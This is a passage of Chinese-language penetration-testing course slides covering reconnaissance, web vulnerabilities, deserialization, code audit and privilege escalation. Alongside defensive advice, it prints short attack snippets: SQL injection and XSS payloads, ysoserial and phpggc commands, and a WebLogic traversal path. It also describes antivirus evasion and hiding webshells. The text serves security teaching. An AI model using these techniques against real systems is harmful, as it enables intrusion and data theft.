版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
小迪安全課件2025版:全面掌握網(wǎng)絡(luò)攻防實(shí)戰(zhàn)技能第一章:網(wǎng)絡(luò)安全基礎(chǔ)與概念入門網(wǎng)絡(luò)安全的學(xué)習(xí)需要扎實(shí)的基礎(chǔ)知識(shí)作為支撐。本章將帶你從核心概念入手,理解安全領(lǐng)域的專業(yè)術(shù)語(yǔ)、操作系統(tǒng)安全機(jī)制以及網(wǎng)絡(luò)協(xié)議的運(yùn)作原理。這些基礎(chǔ)知識(shí)是后續(xù)所有高級(jí)技術(shù)的根基,掌握它們將讓你在實(shí)戰(zhàn)中游刃有余。網(wǎng)絡(luò)安全核心名詞解析POC與EXP概念POC(ProofofConcept)是漏洞概念驗(yàn)證代碼,用于證明漏洞存在但不造成實(shí)際危害。EXP(Exploit)則是完整的漏洞利用程序,可以實(shí)現(xiàn)具體攻擊目標(biāo)如獲取權(quán)限或執(zhí)行任意代碼。Payload攻擊載荷Payload是攻擊中真正執(zhí)行惡意操作的代碼部分,通常由編碼器加密混淆以繞過(guò)安全檢測(cè)。常見類型包括反彈Shell、正向連接、Meterpreter等,根據(jù)目標(biāo)環(huán)境選擇合適載荷至關(guān)重要。后門與木馬區(qū)別后門是預(yù)留的秘密訪問(wèn)通道,可以是代碼漏洞或隱藏賬戶。木馬則偽裝成正常程序誘使用戶執(zhí)行,兩者都用于持久化控制?,F(xiàn)代木馬常采用免殺技術(shù)躲避殺毒軟件檢測(cè)。反彈Shell原理反彈Shell是目標(biāo)主機(jī)主動(dòng)連接攻擊者服務(wù)器,繞過(guò)防火墻出站限制。通過(guò)Bash、Python、Netcat等工具可實(shí)現(xiàn),是內(nèi)網(wǎng)滲透的關(guān)鍵技術(shù)。黑盒測(cè)試vs白盒測(cè)試??黑盒測(cè)試模擬外部攻擊者視角,無(wú)源碼訪問(wèn)權(quán)限通過(guò)漏洞掃描、手工測(cè)試發(fā)現(xiàn)安全問(wèn)題適用于滲透測(cè)試、安全評(píng)估場(chǎng)景時(shí)間成本較高但更貼近實(shí)戰(zhàn)環(huán)境??白盒測(cè)試擁有完整源代碼和系統(tǒng)架構(gòu)文檔通過(guò)代碼審計(jì)深挖邏輯漏洞和安全隱患適用于開發(fā)階段的安全加固操作系統(tǒng)安全基礎(chǔ)Windows安全機(jī)制深度解析Windows系統(tǒng)內(nèi)置多層防護(hù)體系,包括用戶賬戶控制(UAC)、WindowsDefender、防火墻以及ASLR/DEP內(nèi)存保護(hù)機(jī)制。UAC通過(guò)權(quán)限隔離防止未授權(quán)操作,攻擊者常利用白名單程序或COM組件提權(quán)繞過(guò)。WindowsDefender基于行為檢測(cè)和云查殺,免殺技術(shù)需要結(jié)合加殼、反射加載、進(jìn)程注入等手段。注冊(cè)表和服務(wù)是Windows持久化的關(guān)鍵點(diǎn),攻擊者通過(guò)修改啟動(dòng)項(xiàng)、計(jì)劃任務(wù)、DLL劫持實(shí)現(xiàn)隱蔽駐留。PowerShell作為系統(tǒng)管理工具,同時(shí)也是攻擊者最愛的無(wú)文件攻擊載體,可執(zhí)行內(nèi)存馬、遠(yuǎn)程下載惡意腳本。Linux安全加固與繞過(guò)技術(shù)Linux系統(tǒng)安全依賴權(quán)限管理、SELinux強(qiáng)制訪問(wèn)控制以及iptables防火墻。SUID位程序、sudo配置錯(cuò)誤、內(nèi)核漏洞是提權(quán)的主要突破口。攻擊者通過(guò)搜索可寫目錄、定時(shí)任務(wù)、環(huán)境變量劫持等方式獲取root權(quán)限。防火墻繞過(guò)利用代理隧道、協(xié)議封裝、CDN中轉(zhuǎn)等技術(shù)突破防火墻限制,實(shí)現(xiàn)隱蔽通信文件下載技巧在受限環(huán)境使用certutil、bitsadmin、curl、wget等系統(tǒng)自帶工具下載惡意文件權(quán)限維持網(wǎng)絡(luò)協(xié)議與數(shù)據(jù)包基礎(chǔ)HTTP/HTTPS協(xié)議深度剖析HTTP協(xié)議是Web應(yīng)用的通信基礎(chǔ),理解其結(jié)構(gòu)對(duì)漏洞挖掘至關(guān)重要。請(qǐng)求由方法(GET/POST)、URI、協(xié)議版本、請(qǐng)求頭、消息體構(gòu)成,響應(yīng)包含狀態(tài)碼、響應(yīng)頭和內(nèi)容。常見安全問(wèn)題包括明文傳輸、緩存泄露、請(qǐng)求走私等。HTTPS在HTTP基礎(chǔ)上增加TLS/SSL加密層,通過(guò)證書驗(yàn)證服務(wù)器身份。中間人攻擊需要偽造證書或降級(jí)協(xié)議,抓包分析需要安裝根證書信任。SNI字段泄露域名信息,可用于CDN穿透。關(guān)鍵請(qǐng)求頭如Cookie承載會(huì)話令牌、User-Agent標(biāo)識(shí)客戶端、Referer記錄來(lái)源頁(yè)面、X-Forwarded-For傳遞真實(shí)IP。響應(yīng)頭中的Set-Cookie、Content-Type、X-Frame-Options直接影響安全性。抓包工具實(shí)戰(zhàn)應(yīng)用Wireshark網(wǎng)絡(luò)協(xié)議分析利器,支持?jǐn)?shù)百種協(xié)議解析,過(guò)濾語(yǔ)法強(qiáng)大,可追蹤TCP流、重組數(shù)據(jù)包,適合底層協(xié)議分析和流量取證FiddlerWeb調(diào)試代理工具,可攔截修改HTTP/HTTPS請(qǐng)求,支持?jǐn)帱c(diǎn)、重放、壓力測(cè)試,自動(dòng)解密HTTPS,適合Web漏洞挖掘BurpSuite第二章:信息收集與資產(chǎn)探測(cè)"信息收集是滲透測(cè)試的第一步,也是最重要的一步。掌握的信息越多,攻擊面越大,成功概率越高。"在滲透測(cè)試中,信息收集階段決定了后續(xù)攻擊的方向和深度。本章將系統(tǒng)講解如何繞過(guò)CDN定位真實(shí)服務(wù)器、利用搜索引擎挖掘敏感信息、使用自動(dòng)化工具進(jìn)行資產(chǎn)監(jiān)控,以及識(shí)別目標(biāo)系統(tǒng)的技術(shù)架構(gòu)和潛在弱點(diǎn)。CDN繞過(guò)與真實(shí)IP獲取技巧CDN(內(nèi)容分發(fā)網(wǎng)絡(luò))通過(guò)分布式節(jié)點(diǎn)加速訪問(wèn)并隱藏源站IP,給滲透測(cè)試帶來(lái)挑戰(zhàn)。繞過(guò)CDN定位真實(shí)服務(wù)器是信息收集的關(guān)鍵環(huán)節(jié),需要綜合運(yùn)用多種技術(shù)手段。01歷史DNS記錄查詢使用SecurityTrails、威脅情報(bào)平臺(tái)查詢域名歷史解析記錄,CDN部署前的IP可能仍是真實(shí)服務(wù)器02子域名探測(cè)掃描目標(biāo)的子域名(如mail.、dev.、test.),這些子站點(diǎn)往往未接入CDN,直接解析到源站IP03全網(wǎng)掃描定位使用Zmap、Masscan全網(wǎng)掃描443端口,通過(guò)證書CN字段或HTTP響應(yīng)特征匹配真實(shí)服務(wù)器04社會(huì)工程學(xué)手段通過(guò)郵件系統(tǒng)、RSS訂閱、APP接口等服務(wù)觸發(fā)源站主動(dòng)連接,從而獲取真實(shí)IP地址實(shí)戰(zhàn)工具集??Fuckcdn自動(dòng)化CDN繞過(guò)工具,集成多種探測(cè)方法,支持批量檢測(cè),輸出可信度評(píng)分??Zmap高速網(wǎng)絡(luò)掃描器,可在45分鐘內(nèi)掃描全球IPv4地址空間,適合大規(guī)模資產(chǎn)發(fā)現(xiàn)??Whois查詢查詢域名注冊(cè)信息、DNS服務(wù)器,通過(guò)注冊(cè)郵箱、服務(wù)商信息推測(cè)目標(biāo)資產(chǎn)資產(chǎn)監(jiān)控與漏洞探測(cè)網(wǎng)絡(luò)空間測(cè)繪引擎應(yīng)用Fofa、Shodan、Quake、ZoomEye等平臺(tái)通過(guò)持續(xù)掃描互聯(lián)網(wǎng)設(shè)備,建立全球資產(chǎn)指紋庫(kù)。掌握搜索語(yǔ)法可以精準(zhǔn)定位特定系統(tǒng)、版本、組件,大幅提高漏洞挖掘效率。Fofa高級(jí)語(yǔ)法支持title、header、body、cert等字段組合查詢。例如:body="poweredby"&&country="CN"&&port="8080"可快速篩選國(guó)內(nèi)特定CMS系統(tǒng)Quake威脅情報(bào)360推出的網(wǎng)絡(luò)空間測(cè)繪平臺(tái),集成漏洞情報(bào)、資產(chǎn)監(jiān)控、威脅分析功能,支持API自動(dòng)化調(diào)用Kunyu工具鏈基于FofaAPI的紅隊(duì)工具,可自動(dòng)提取企業(yè)全量資產(chǎn)、識(shí)別Web框架、導(dǎo)出批量掃描目標(biāo)列表敏感信息泄露檢測(cè)Git源碼泄露開發(fā)人員誤將.git目錄上傳至生產(chǎn)環(huán)境,攻擊者可通過(guò)GitHack工具恢復(fù)完整源碼。檢測(cè)URL:/.git/config防御措施包括配置Web服務(wù)器禁止訪問(wèn)隱藏文件,使用.gitignore排除敏感文件,定期審計(jì)生產(chǎn)環(huán)境目錄結(jié)構(gòu)。SVN與備份文件SVN版本控制系統(tǒng)的.svn目錄、編輯器自動(dòng)生成的.swp、數(shù)據(jù)庫(kù)備份.sql、壓縮包.zip/.rar等文件常包含敏感數(shù)據(jù)。使用Dirsearch、御劍等工具掃描常見備份文件路徑,也可通過(guò).DS_Store文件遍歷Mac系統(tǒng)上的目錄結(jié)構(gòu)。Web架構(gòu)與中間件安全企業(yè)級(jí)Web架構(gòu)解析現(xiàn)代Web應(yīng)用通常采用多層架構(gòu)提升性能和安全性。前端通過(guò)CDN加速靜態(tài)資源,負(fù)載均衡器(Nginx/HAProxy)將流量分發(fā)到多臺(tái)應(yīng)用服務(wù)器,WAF(Web應(yīng)用防火墻)過(guò)濾惡意請(qǐng)求,應(yīng)用服務(wù)器與數(shù)據(jù)庫(kù)服務(wù)器物理隔離實(shí)現(xiàn)站庫(kù)分離。CDN層緩存靜態(tài)資源,隱藏源站IP,提供DDoS防護(hù)WAF防護(hù)檢測(cè)SQL注入、XSS等攻擊,基于規(guī)則或AI識(shí)別威脅負(fù)載均衡分配請(qǐng)求流量,實(shí)現(xiàn)高可用和水平擴(kuò)展應(yīng)用服務(wù)器處理業(yè)務(wù)邏輯,運(yùn)行Web框架和中間件數(shù)據(jù)庫(kù)層存儲(chǔ)持久化數(shù)據(jù),主從復(fù)制保證可靠性常見中間件漏洞與防御中間件典型漏洞防御策略Apache解析漏洞、目錄遍歷、SSI注入升級(jí)到最新版本,禁用不必要模塊,配置白名單后綴Nginx目錄穿越、整數(shù)溢出、解析漏洞修復(fù)fastcgi_split配置,限制請(qǐng)求體大小Tomcat任意文件上傳(CVE-2017-12615)、反序列化禁用PUT方法,更新到安全版本,刪除默認(rèn)應(yīng)用IIS短文件名泄露、PUT上傳、解析漏洞禁用WebDAV,配置請(qǐng)求過(guò)濾,關(guān)閉目錄瀏覽Weblogic反序列化RCE、任意文件上傳、SSRF及時(shí)打補(bǔ)丁,刪除console控制臺(tái),網(wǎng)絡(luò)隔離第三章:Web應(yīng)用安全攻防Web漏洞是滲透測(cè)試的核心戰(zhàn)場(chǎng)Web應(yīng)用層漏洞占據(jù)網(wǎng)絡(luò)攻擊的絕大部分,從經(jīng)典的SQL注入、XSS到現(xiàn)代的反序列化、SSRF,攻防技術(shù)不斷演進(jìn)。本章深入剖析各類Web漏洞的原理、利用手法和防御方案,通過(guò)真實(shí)案例演示如何發(fā)現(xiàn)并利用漏洞獲取敏感數(shù)據(jù)或服務(wù)器權(quán)限。我們將系統(tǒng)學(xué)習(xí)文件上傳繞過(guò)技巧、跨站腳本攻擊的多種變形、CSRF與SSRF的區(qū)別與聯(lián)系,以及如何結(jié)合業(yè)務(wù)邏輯挖掘高危漏洞。掌握這些技能后,你將具備獨(dú)立完成Web滲透測(cè)試的能力。SQL注入全解析SQL注入是Web安全最經(jīng)典的漏洞類型,攻擊者通過(guò)構(gòu)造惡意SQL語(yǔ)句,繞過(guò)應(yīng)用程序邏輯直接操作數(shù)據(jù)庫(kù)。危害包括數(shù)據(jù)泄露、權(quán)限提升、植入后門甚至控制服務(wù)器。多數(shù)據(jù)庫(kù)注入技巧對(duì)比MySQL注入聯(lián)合查詢:UNIONSELECT報(bào)錯(cuò)注入:updatexml()布爾盲注:AND1=1時(shí)間盲注:SLEEP(5)堆疊查詢:;DROPTABLEOracle注入注釋符號(hào):--字符串拼接:||偽表:FROMdual報(bào)錯(cuò)函數(shù):utl_inaddr權(quán)限查詢:DBA_TABLESMongoDB注入NoSQL特性利用JSON查詢繞過(guò)$ne操作符注入$regex正則盲注JavaScript代碼執(zhí)行高級(jí)注入技術(shù)實(shí)戰(zhàn)盲注技術(shù)當(dāng)頁(yè)面無(wú)回顯時(shí),通過(guò)布爾邏輯(真假判斷)或時(shí)間延遲(sleep函數(shù))逐字符猜解數(shù)據(jù)。自動(dòng)化工具SQLmap支持多種盲注算法,可配合二分法提速。堆疊注入部分?jǐn)?shù)據(jù)庫(kù)(如SQLServer)支持一次執(zhí)行多條語(yǔ)句,用分號(hào)分隔。可利用此特性執(zhí)行DROP、UPDATE等危險(xiǎn)操作,或調(diào)用xp_cmdshell執(zhí)行系統(tǒng)命令。DNS帶外注入通過(guò)load_file()、UNC路徑等函數(shù)觸發(fā)DNS查詢,將數(shù)據(jù)外帶到攻擊者控制的域名。適用于無(wú)回顯且時(shí)間盲注被禁用的場(chǎng)景,需配合DNSlog平臺(tái)接收數(shù)據(jù)。防御建議:使用參數(shù)化查詢(PreparedStatement)徹底杜絕SQL注入,避免拼接SQL字符串。對(duì)用戶輸入進(jìn)行嚴(yán)格過(guò)濾和轉(zhuǎn)義,最小化數(shù)據(jù)庫(kù)賬戶權(quán)限,部署WAF作為縱深防御。文件上傳漏洞與繞過(guò)文件上傳功能若缺乏嚴(yán)格校驗(yàn),攻擊者可上傳WebShell獲取服務(wù)器控制權(quán)。上傳漏洞的利用需要繞過(guò)前端校驗(yàn)、MIME類型檢測(cè)、文件擴(kuò)展名過(guò)濾、內(nèi)容檢測(cè)等多重防護(hù)。前端校驗(yàn)繞過(guò)JavaScript校驗(yàn)可通過(guò)禁用JS、修改HTML代碼、使用Burp抓包改包輕松繞過(guò),不應(yīng)作為唯一防線MIME類型欺騙修改Content-Type為image/jpeg等白名單類型,配合文件頭魔術(shù)字節(jié)(如GIF89a)混淆檢測(cè)機(jī)制擴(kuò)展名繞過(guò)技巧利用黑名單不全(phtml/php5)、大小寫混淆(AsP)、雙寫繞過(guò)(pphphp)、截?cái)喙?%00)、htaccess解析等手法二次渲染攻擊圖片馬被重新渲染后代碼丟失,需在不被破壞的區(qū)域(如EXIF注釋)寫入Payload,或利用條件競(jìng)爭(zhēng)在渲染前訪問(wèn)編輯器與CMS已知漏洞富文本編輯器漏洞FCKeditor:歷史版本存在任意文件上傳,訪問(wèn)/editor/filemanager/connectors/test.htmlKindeditor:JSON參數(shù)注入,可上傳任意后綴文件eWebEditor:默認(rèn)數(shù)據(jù)庫(kù)路徑暴露,后臺(tái)弱口令UEditor:SSRF漏洞,可抓取內(nèi)網(wǎng)文件CMS上傳漏洞案例DedeCMS:會(huì)員中心頭像上傳,重命名繞過(guò)WordPress:插件上傳點(diǎn)多,版本差異大ThinkPHP:5.x版本存在RCE,可直接GetShellStruts2:文件上傳攔截器繞過(guò)免殺技巧:使用加密WebShell、反射調(diào)用、動(dòng)態(tài)函數(shù)執(zhí)行、無(wú)特征碼馬繞過(guò)安全軟件。將惡意代碼分段存儲(chǔ)在不同文件,運(yùn)行時(shí)動(dòng)態(tài)拼接執(zhí)行。XSS跨站攻擊深度剖析XSS攻擊類型與原理反射型XSS惡意腳本通過(guò)URL參數(shù)傳遞,服務(wù)器未過(guò)濾直接輸出到頁(yè)面。需誘使受害者點(diǎn)擊構(gòu)造的鏈接,常用于釣魚攻擊。示例:/search?q=<script>alert(1)</script>存儲(chǔ)型XSS惡意代碼存儲(chǔ)在數(shù)據(jù)庫(kù)中,所有訪問(wèn)該頁(yè)面的用戶都會(huì)被攻擊。危害最大,常出現(xiàn)在留言板、評(píng)論區(qū)、個(gè)人資料等功能。攻擊鏈:提交惡意評(píng)論→存入數(shù)據(jù)庫(kù)→其他用戶瀏覽→觸發(fā)腳本執(zhí)行DOM型XSS漏洞存在于客戶端JavaScript代碼,通過(guò)修改DOM環(huán)境執(zhí)行攻擊。服務(wù)器無(wú)法檢測(cè),需審計(jì)前端代碼中的innerHTML、eval等危險(xiǎn)函數(shù)。常見場(chǎng)景:document.write(location.hash)XSS繞過(guò)與利用技術(shù)編碼繞過(guò)技術(shù)HTML實(shí)體編碼:<script>URL編碼:%3Cscript%3EUnicode編碼:\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e十六進(jìn)制編碼:\x3cscript\x3eBase64編碼配合atob解碼多重編碼組合可繞過(guò)正則過(guò)濾,需根據(jù)上下文選擇編碼方式。CSP策略繞過(guò)Content-Security-Policy限制腳本來(lái)源,但存在繞過(guò)方法:利用白名單中的JSONP接口iframe配合sandbox屬性利用CSP的unsafe-inline配置錯(cuò)誤通過(guò)Base標(biāo)簽改變相對(duì)路徑ServiceWorker劫持請(qǐng)求HttpOnly繞過(guò)與Cookie竊取HttpOnly標(biāo)志防止JavaScript讀取Cookie,但可通過(guò)以下手段繞過(guò):利用XSS發(fā)起AJAX請(qǐng)求攜帶Cookie、通過(guò)CSRF攻擊執(zhí)行敏感操作、利用瀏覽器0day漏洞(CVE-2012-0053ApacheHttpOnly繞過(guò))、中間人攻擊降級(jí)HTTPS竊取Cookie?,F(xiàn)代瀏覽器還存在Same-SiteCookie繞過(guò)技巧。CSRF與SSRF攻擊實(shí)戰(zhàn)CSRF跨站請(qǐng)求偽造原理CSRF攻擊利用用戶已認(rèn)證的會(huì)話,誘使其在不知情的情況下執(zhí)行非預(yù)期操作。攻擊者構(gòu)造惡意頁(yè)面,包含指向目標(biāo)站點(diǎn)的請(qǐng)求(如轉(zhuǎn)賬、修改密碼),受害者訪問(wèn)時(shí)瀏覽器自動(dòng)攜帶Cookie完成攻擊。1用戶登錄網(wǎng)站A瀏覽器保存認(rèn)證Cookie2訪問(wèn)攻擊者網(wǎng)站B頁(yè)面包含惡意請(qǐng)求代碼3瀏覽器發(fā)起請(qǐng)求自動(dòng)攜帶網(wǎng)站A的Cookie4網(wǎng)站A執(zhí)行操作誤認(rèn)為是用戶主動(dòng)行為防御機(jī)制與繞過(guò)技術(shù)Token校驗(yàn)機(jī)制服務(wù)器生成隨機(jī)Token嵌入表單,提交時(shí)驗(yàn)證Token有效性。攻擊者無(wú)法預(yù)測(cè)Token值,CSRF攻擊失敗。繞過(guò)方法:利用XSS漏洞讀取Token、子域名劫持、中間人攻擊攔截Token、Token在URL中泄露(Referer頭)。Referer同源策略檢查請(qǐng)求來(lái)源是否為可信域名,拒絕外部站點(diǎn)發(fā)起的請(qǐng)求。繞過(guò)方法:在可信域名下找XSS或JSONP、利用瀏覽器不發(fā)送Referer的特性(IEquirksmode)、通過(guò)中間頁(yè)面跳轉(zhuǎn)清空Referer。SSRF服務(wù)端請(qǐng)求偽造攻擊SSRF誘使服務(wù)器向攻擊者指定的目標(biāo)發(fā)起請(qǐng)求,常用于探測(cè)內(nèi)網(wǎng)、讀取本地文件、攻擊內(nèi)網(wǎng)服務(wù)。典型場(chǎng)景包括圖片加載、網(wǎng)頁(yè)抓取、Webhook回調(diào)、PDF生成等功能。協(xié)議利用file://讀取本地文件、dict://探測(cè)端口、gopher://發(fā)送任意TCP數(shù)據(jù)、ftp://列目錄繞過(guò)技術(shù)IP地址進(jìn)制轉(zhuǎn)換、302跳轉(zhuǎn)、短地址、DNSrebinding、IPv6地址無(wú)回顯利用通過(guò)DNSlog/HTTPlog平臺(tái)接收數(shù)據(jù)、時(shí)間盲注探測(cè)端口、利用內(nèi)網(wǎng)Redis寫shell第四章:代碼審計(jì)與漏洞挖掘從源碼層面發(fā)現(xiàn)安全隱患代碼審計(jì)是白盒測(cè)試的核心技能,通過(guò)分析源代碼邏輯發(fā)現(xiàn)漏洞,相比黑盒測(cè)試能挖掘更深層次的安全問(wèn)題。本章重點(diǎn)講解PHP和Java兩大主流語(yǔ)言的常見漏洞模式,包括反序列化、代碼注入、邏輯缺陷等。我們將學(xué)習(xí)如何追蹤危險(xiǎn)函數(shù)調(diào)用鏈、分析MVC框架的安全機(jī)制、識(shí)別業(yè)務(wù)邏輯漏洞,并通過(guò)真實(shí)開源項(xiàng)目案例演示完整的審計(jì)流程。掌握代碼審計(jì)能力后,你可以在開發(fā)階段就消除安全隱患,實(shí)現(xiàn)"安全左移"。PHP與Java反序列化漏洞PHP反序列化攻擊原理PHP的unserialize()函數(shù)將序列化字符串還原為對(duì)象,若未對(duì)輸入進(jìn)行過(guò)濾,攻擊者可構(gòu)造惡意序列化數(shù)據(jù)觸發(fā)代碼執(zhí)行。利用魔術(shù)方法(__wakeup、__destruct、__toString等)自動(dòng)調(diào)用特性,構(gòu)造POP鏈(面向?qū)傩跃幊?實(shí)現(xiàn)任意代碼執(zhí)行。01尋找反序列化入口搜索unserialize()函數(shù)調(diào)用點(diǎn),檢查輸入是否可控02發(fā)現(xiàn)可利用的類查找包含危險(xiǎn)函數(shù)的魔術(shù)方法,如__destruct中的eval()03構(gòu)造POP鏈利用對(duì)象屬性控制流,逐步觸發(fā)漏洞函數(shù)執(zhí)行04生成惡意Payload序列化構(gòu)造的對(duì)象,傳入目標(biāo)應(yīng)用觸發(fā)攻擊Java反序列化RCEJava的ObjectInputStream.readObject()存在類似風(fēng)險(xiǎn)。ApacheCommonsCollections、FastJSON、Jackson等組件曾爆出多個(gè)反序列化漏洞,影響范圍極廣。經(jīng)典利用鏈:CommonsCollections:InvokerTransformer鏈,可調(diào)用任意方法執(zhí)行Runtime.exec()FastJSON:autotype開關(guān)不當(dāng),可指定類名反序列化JdbcRowSetImpl加載惡意類Shiro:Remember-Me反序列化,硬編碼AES密鑰Log4j:JNDI注入,通過(guò)LDAP加載遠(yuǎn)程惡意類自動(dòng)化工具與CVE繞過(guò)PHPGGC工具:PHP反序列化Payload生成器,內(nèi)置數(shù)十種框架的利用鏈(Laravel、Symfony、Yii2等),支持自定義Gadget鏈。使用命令:phpggcLaravel/RCE1system'id'-bYsoserial工具:Java反序列化利用工具,集成常見組件的攻擊鏈。命令示例:java-jarysoserial.jarCommonsCollections6"calc"|base64CVE繞過(guò)技巧:利用編碼差異(UTF-8/GBK)、類名大小寫不敏感、魔術(shù)方法調(diào)用順序、Phar偽協(xié)議觸發(fā)反序列化等手法繞過(guò)黑名單過(guò)濾和版本限制。代碼審計(jì)實(shí)戰(zhàn)技巧危險(xiǎn)函數(shù)與漏洞模式識(shí)別SQL注入審計(jì)搜索拼接SQL語(yǔ)句的代碼,檢查變量是否經(jīng)過(guò)過(guò)濾。關(guān)鍵函數(shù):mysqli_query、PDO::query、executeQuery。正則匹配:SELECT.*\$_GET|POST文件包含漏洞檢查include/require參數(shù)是否可控。利用偽協(xié)議(php://filter、data://)讀取源碼或執(zhí)行代碼。防御需白名單限制文件路徑。命令執(zhí)行審計(jì)審計(jì)system()、exec()、shell_exec()、passthru()等函數(shù)。檢查是否使用escapeshellarg()過(guò)濾,注意管道符|、&&等命令連接符。代碼執(zhí)行漏洞eval()、assert()、create_function()、preg_replace/e修飾符可執(zhí)行任意PHP代碼。動(dòng)態(tài)函數(shù)調(diào)用$func()也存在風(fēng)險(xiǎn)。MVC框架安全分析現(xiàn)代框架雖內(nèi)置安全機(jī)制,但配置不當(dāng)或業(yè)務(wù)代碼缺陷仍可能引入漏洞。審計(jì)重點(diǎn)包括:路由與權(quán)限控制檢查是否存在未授權(quán)訪問(wèn)的控制器方法分析中間件(Middleware)是否正確應(yīng)用測(cè)試路由參數(shù)污染和越權(quán)訪問(wèn)審計(jì)RBAC權(quán)限判斷邏輯是否嚴(yán)謹(jǐn)ORM安全問(wèn)題原生SQL查詢是否存在注入風(fēng)險(xiǎn)批量賦值(MassAssignment)是否過(guò)濾敏感字段關(guān)聯(lián)查詢是否可通過(guò)參數(shù)控制SQL日志是否記錄敏感信息審計(jì)流程建議:從敏感操作入口(登錄、支付、文件操作)倒推代碼流程,使用IDE全局搜索危險(xiǎn)函數(shù),結(jié)合黑盒測(cè)試驗(yàn)證漏洞可利用性,最后編寫詳細(xì)的安全報(bào)告。業(yè)務(wù)邏輯漏洞識(shí)別業(yè)務(wù)邏輯漏洞源于設(shè)計(jì)缺陷而非代碼錯(cuò)誤,自動(dòng)化工具難以發(fā)現(xiàn),需要深入理解業(yè)務(wù)流程。這類漏洞危害巨大,可能導(dǎo)致資金損失、數(shù)據(jù)泄露、權(quán)限繞過(guò)等嚴(yán)重后果。常見業(yè)務(wù)邏輯漏洞類型水平越權(quán)訪問(wèn)用戶A可以訪問(wèn)用戶B的數(shù)據(jù)。通過(guò)修改參數(shù)(用戶ID、訂單號(hào))測(cè)試,查看是否校驗(yàn)所屬關(guān)系。案例:修改URL中的uid=123為uid=124查看他人信息。垂直越權(quán)提權(quán)普通用戶可執(zhí)行管理員操作。測(cè)試方法:抓取管理員請(qǐng)求,使用普通賬號(hào)重放。常見于角色切換、權(quán)限校驗(yàn)遺漏的功能點(diǎn)。支付邏輯篡改修改支付金額、商品ID、折扣參數(shù)繞過(guò)校驗(yàn)。使用Burp修改POST數(shù)據(jù)中的price、quantity字段,觀察服務(wù)器是否重新計(jì)算總價(jià)。驗(yàn)證碼繞過(guò)驗(yàn)證碼可重復(fù)使用、不過(guò)期、可爆破、可預(yù)測(cè)、前端校驗(yàn)。測(cè)試:抓包刪除驗(yàn)證碼參數(shù)、重放同一驗(yàn)證碼、高頻請(qǐng)求測(cè)試限制。實(shí)戰(zhàn)案例:密碼重置漏洞響應(yīng)包篡改:修改返回的JSON中success:false為true跳過(guò)驗(yàn)證Token通用性:一個(gè)手機(jī)號(hào)的驗(yàn)證碼可用于任意賬號(hào)憑證未失效:重置密碼的鏈接永久有效或可重復(fù)使用用戶混淆:步驟1提交用戶A,步驟2修改參數(shù)為用戶B完成重置回傳泄露:驗(yàn)證碼或重置Token在響應(yīng)包中直接返回挖掘技巧:關(guān)注多步驟流程(注冊(cè)、登錄、支付)、批量操作、優(yōu)惠活動(dòng)、積分系統(tǒng)等復(fù)雜業(yè)務(wù)。使用不同權(quán)限賬號(hào)對(duì)比測(cè)試,觀察請(qǐng)求參數(shù)與業(yè)務(wù)邏輯是否一致。第五章:系統(tǒng)與服務(wù)安全深入操作系統(tǒng)底層攻防獲取Web權(quán)限后,下一步是提升為系統(tǒng)管理員權(quán)限并橫向滲透內(nèi)網(wǎng)。本章聚焦操作系統(tǒng)層面的安全問(wèn)題,包括數(shù)據(jù)庫(kù)未授權(quán)訪問(wèn)、提權(quán)漏洞利用、中間件服務(wù)攻擊以及協(xié)議層面的漏洞挖掘。我們將實(shí)戰(zhàn)演練Linux內(nèi)核提權(quán)、Windows令牌竊取、數(shù)據(jù)庫(kù)Getshell等高級(jí)技術(shù),掌握從Web突破到系統(tǒng)完全控制的完整攻擊鏈。這些技能是紅隊(duì)滲透和應(yīng)急響應(yīng)人員的必備知識(shí)。數(shù)據(jù)庫(kù)安全與提權(quán)技術(shù)數(shù)據(jù)庫(kù)未授權(quán)訪問(wèn)風(fēng)險(xiǎn)Redis未授權(quán)默認(rèn)無(wú)密碼監(jiān)聽6379端口,可寫SSH公鑰、crontab定時(shí)任務(wù)、webshell。防御:設(shè)置requirepass密碼,綁定,禁用危險(xiǎn)命令。MySQL高權(quán)具有FILE權(quán)限可讀寫文件,通過(guò)INTOOUTFILE寫shell、LOAD_FILE讀配置。提權(quán)利用UDF動(dòng)態(tài)鏈接庫(kù)執(zhí)行系統(tǒng)命令、MOF提權(quán)(Windows)。MongoDB暴露早期版本默認(rèn)無(wú)認(rèn)證,27017端口直連可讀寫數(shù)據(jù)。勒索軟件曾大規(guī)模掃描刪庫(kù)勒索。加固需啟用auth、網(wǎng)絡(luò)隔離、最小權(quán)限。PostgreSQL提權(quán)利用COPY命令寫文件、largeobject讀取文件、創(chuàng)建擴(kuò)展執(zhí)行代碼。CVE-2019-9193可提權(quán)到postgres用戶執(zhí)行任意命令。Linux提權(quán)實(shí)戰(zhàn)技術(shù)臟牛漏洞(CVE-2016-5195)Linux內(nèi)核內(nèi)存子系統(tǒng)競(jìng)態(tài)條件漏洞,影響2.6.22-4.8.3所有版本。利用Copy-On-Write機(jī)制,普通用戶可修改只讀文件,直接改/etc/passwd添加root賬戶。利用腳本:dirty.c編譯后執(zhí)行,幾秒內(nèi)完成提權(quán)。防御需升級(jí)內(nèi)核版本。SUID權(quán)限提升查找具有SUID位的可執(zhí)行文件:find/-perm-40002>/dev/null可利用的SUID程序:nmap--interactive(舊版本)vim.tiny通過(guò)python執(zhí)行命令find-exec參數(shù)執(zhí)行shell自定義SUID程序的漏洞Windows提權(quán)技術(shù)Windows提權(quán)常用手法包括:令牌竊取(JuicyPotato)、內(nèi)核漏洞利用(MS17-010/永恒之藍(lán))、服務(wù)配置不當(dāng)(unquotedservicepath)、DLL劫持、AlwaysInstallElevated策略、計(jì)劃任務(wù)權(quán)限、注冊(cè)表AutoRun鍵值等。工具如Metasploit、PowerUp.ps1可自動(dòng)化檢測(cè)提權(quán)向量。中間件安全漏洞復(fù)現(xiàn)主流中間件CVE分析中間件CVE編號(hào)漏洞描述利用方法IISCVE-2017-7269WebDAV遠(yuǎn)程代碼執(zhí)行利用BufferOverflow執(zhí)行ShellcodeApacheCVE-2021-41773路徑穿越與RCE構(gòu)造/../cgi-bin/讀取任意文件TomcatCVE-2020-1938Ghostcat文件讀取AJP協(xié)議8009端口讀取配置文件NginxCVE-2013-4547解析漏洞上傳test.jpg空格.php繞過(guò)解析WeblogicCVE-2020-14882Console未授權(quán)RCE訪問(wèn)/console/css/%252e%252e/觸發(fā)WeblogicT3協(xié)議反序列化Weblogic的T